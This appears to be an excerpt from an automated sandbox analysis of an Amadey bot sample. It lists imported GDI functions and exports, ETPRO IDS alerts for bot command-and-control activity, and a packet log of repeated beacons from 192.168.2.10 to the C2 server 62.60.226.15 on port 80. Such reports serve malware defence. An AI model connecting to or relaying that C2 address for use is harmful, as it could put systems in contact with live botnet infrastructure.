SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetObjectA, GetBrushOrgEx, GetCurrentPositionEx, SetDCPenColor, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, GetPolyFillMode, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x4e0e90
__dbk_fcall_wrapper | 2 | 0x411be8
dbkFCallWrapperAddr | 1 | 0x989640
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T15:26:45.224974+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49714 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:45.224974+0100 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.10 | 49714 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:48.353310+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49715 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:51.362062+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49717 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:54.291473+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49719 | 62.60.226.15 | 80 | TCP
2024-12-16T15:26:57.320156+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49721 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:00.400999+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49724 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:03.413713+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49726 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:06.394649+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49729 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:09.529479+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49730 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:12.443161+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49731 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:15.474901+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49732 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:18.378506+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49733 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:21.399440+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49735 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:24.316666+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49736 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:27.406642+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49737 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:30.416977+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49738 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:33.426547+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49739 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:36.331229+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49740 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:39.344102+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49741 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:44.971085+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49742 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:47.992324+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49744 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:50.897185+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49745 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:53.914198+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49746 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:56.847198+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49747 | 62.60.226.15 | 80 | TCP
2024-12-16T15:27:59.914671+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49748 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:02.875484+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49749 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:05.950272+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49750 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:08.862170+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49751 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:11.888302+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49752 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:14.913330+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49753 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:17.950542+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49754 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:20.870653+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49755 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:23.925340+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49756 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:26.839464+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49757 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:29.870544+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49758 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:32.799344+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49759 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:35.817002+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49760 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:38.754130+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49761 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:41.845113+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49762 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:44.747663+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49763 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:47.798530+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49764 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:50.703438+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49765 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:53.721470+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49766 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:56.644659+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49767 | 62.60.226.15 | 80 | TCP
2024-12-16T15:28:59.674367+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49768 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:02.594430+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49769 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:05.614851+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49770 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:08.634245+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49771 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:11.647684+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49772 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:14.555622+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49773 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:17.565382+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49774 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:20.475157+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49775 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:23.497436+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49776 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:26.426738+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49777 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:29.457152+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49778 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:32.365433+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49779 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:35.385154+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49780 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:38.291763+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49781 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:41.307857+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49782 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:44.244429+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49783 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:47.343687+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49784 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:50.245706+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49785 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:53.259229+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49786 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:56.163704+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49787 | 62.60.226.15 | 80 | TCP
2024-12-16T15:29:59.176037+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49788 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:02.089631+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49789 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:05.282733+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49790 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:08.182139+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49791 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:11.266405+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49792 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:14.166027+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49793 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:17.187703+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49794 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:20.087650+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49795 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:23.097527+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49796 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:26.007164+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49797 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:29.047734+0100 | 2856097 | ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) | 1 | 192.168.2.10 | 49798 | 62.60.226.15 | 80 | TCP
2024-12-16T15:30:31.953635+0100 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.10 | 49799 | 62.60.226.15 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 15:26:43.834256887 CET | 49714 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:43.954107046 CET | 80 | 49714 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:43.954211950 CET | 49714 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:43.954461098 CET | 49714 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:44.076771975 CET | 80 | 49714 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:45.224833965 CET | 80 | 49714 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:45.224973917 CET | 49714 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:46.737582922 CET | 49714 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:46.738023043 CET | 49715 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:46.857806921 CET | 80 | 49714 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:46.857819080 CET | 80 | 49715 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:46.857913017 CET | 49714 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:46.857969046 CET | 49715 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:46.858215094 CET | 49715 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:46.978010893 CET | 80 | 49715 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:48.353238106 CET | 80 | 49715 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:48.353310108 CET | 49715 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:49.971374989 CET | 49715 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:49.971738100 CET | 49717 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:50.091572046 CET | 80 | 49715 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:50.091589928 CET | 80 | 49717 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:50.091727018 CET | 49717 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:50.091727018 CET | 49715 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:50.092807055 CET | 49717 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:50.213057995 CET | 80 | 49717 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:51.362000942 CET | 80 | 49717 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:51.362061977 CET | 49717 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:52.878149033 CET | 49717 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:52.878413916 CET | 49719 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:52.998404026 CET | 80 | 49719 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:52.998681068 CET | 49719 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:52.998740911 CET | 80 | 49717 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:52.998825073 CET | 49717 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:52.998887062 CET | 49719 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:53.118884087 CET | 80 | 49719 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:54.291321993 CET | 80 | 49719 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:54.291472912 CET | 49719 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:55.926737070 CET | 49719 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:55.927150011 CET | 49721 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:56.046885967 CET | 80 | 49721 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:56.047089100 CET | 80 | 49719 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:56.047112942 CET | 49721 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:56.047148943 CET | 49719 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:56.047297001 CET | 49721 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:56.166974068 CET | 80 | 49721 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:57.320094109 CET | 80 | 49721 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:57.320156097 CET | 49721 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:58.830748081 CET | 49721 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:58.831209898 CET | 49724 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:59.121535063 CET | 80 | 49724 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:59.121640921 CET | 80 | 49721 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:26:59.121697903 CET | 49721 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:59.121699095 CET | 49724 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:59.122020006 CET | 49724 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:26:59.241924047 CET | 80 | 49724 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:00.400932074 CET | 80 | 49724 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:00.400999069 CET | 49724 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:02.018484116 CET | 49724 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:02.019300938 CET | 49726 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:02.138840914 CET | 80 | 49724 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:02.139017105 CET | 49724 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:02.139089108 CET | 80 | 49726 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:02.139183044 CET | 49726 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:02.139483929 CET | 49726 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:02.259147882 CET | 80 | 49726 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:03.413563013 CET | 80 | 49726 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:03.413712978 CET | 49726 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:05.002695084 CET | 49726 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:05.003137112 CET | 49729 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:05.122983932 CET | 80 | 49729 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:05.123104095 CET | 80 | 49726 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:05.123173952 CET | 49729 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:05.123173952 CET | 49726 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:05.123493910 CET | 49729 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:05.243282080 CET | 80 | 49729 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:06.394505024 CET | 80 | 49729 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:06.394649029 CET | 49729 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:08.127666950 CET | 49729 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:08.127980947 CET | 49730 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:08.248212099 CET | 80 | 49730 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:08.249468088 CET | 49730 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:08.249468088 CET | 49730 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:08.272063971 CET | 80 | 49729 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:08.272443056 CET | 49729 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:08.369450092 CET | 80 | 49730 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:09.527472019 CET | 80 | 49730 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:09.529479027 CET | 49730 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:11.051611900 CET | 49730 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:11.051862955 CET | 49731 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:11.171794891 CET | 80 | 49731 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:11.171992064 CET | 49731 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:11.172159910 CET | 80 | 49730 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:11.172192097 CET | 49731 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:11.172234058 CET | 49730 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:11.291851997 CET | 80 | 49731 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:12.442954063 CET | 80 | 49731 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:12.443161011 CET | 49731 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:14.065393925 CET | 49731 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:14.065958977 CET | 49732 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:14.185671091 CET | 80 | 49731 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:14.185795069 CET | 80 | 49732 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:14.185880899 CET | 49731 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:14.185980082 CET | 49732 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:14.186387062 CET | 49732 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:14.306175947 CET | 80 | 49732 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:15.474734068 CET | 80 | 49732 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:15.474900961 CET | 49732 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:16.988177061 CET | 49732 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:16.988538980 CET | 49733 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:17.108315945 CET | 80 | 49732 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:17.108340025 CET | 80 | 49733 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:17.108436108 CET | 49732 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:17.108473063 CET | 49733 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:17.108700991 CET | 49733 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:17.229002953 CET | 80 | 49733 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:18.378388882 CET | 80 | 49733 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:18.378505945 CET | 49733 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:20.002840996 CET | 49733 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:20.003293991 CET | 49735 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:20.123058081 CET | 80 | 49733 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:20.123076916 CET | 80 | 49735 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:20.123239040 CET | 49733 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:20.123239040 CET | 49735 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:20.123505116 CET | 49735 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:20.243201971 CET | 80 | 49735 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:21.397772074 CET | 80 | 49735 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:21.399440050 CET | 49735 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:22.911669970 CET | 49735 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:22.912107944 CET | 49736 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:23.032208920 CET | 80 | 49736 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:23.032345057 CET | 49736 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:23.032721996 CET | 49736 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:23.032825947 CET | 80 | 49735 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:23.032883883 CET | 49735 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:23.152745008 CET | 80 | 49736 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:24.316565037 CET | 80 | 49736 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:24.316665888 CET | 49736 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:26.018182039 CET | 49736 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:26.018562078 CET | 49737 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:26.138323069 CET | 80 | 49737 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:26.138338089 CET | 80 | 49736 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:26.138401031 CET | 49737 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:26.138434887 CET | 49736 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:26.249377966 CET | 49737 | 80 | 192.168.2.10 | 62.60.226.15
Dec 16, 2024 15:27:26.369301081 CET | 80 | 49737 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:27.406558990 CET | 80 | 49737 | 62.60.226.15 | 192.168.2.10
Dec 16, 2024 15:27:27.406641960 CET | 49737 | 80 | 192.168.2.10 | 62.60.226.15
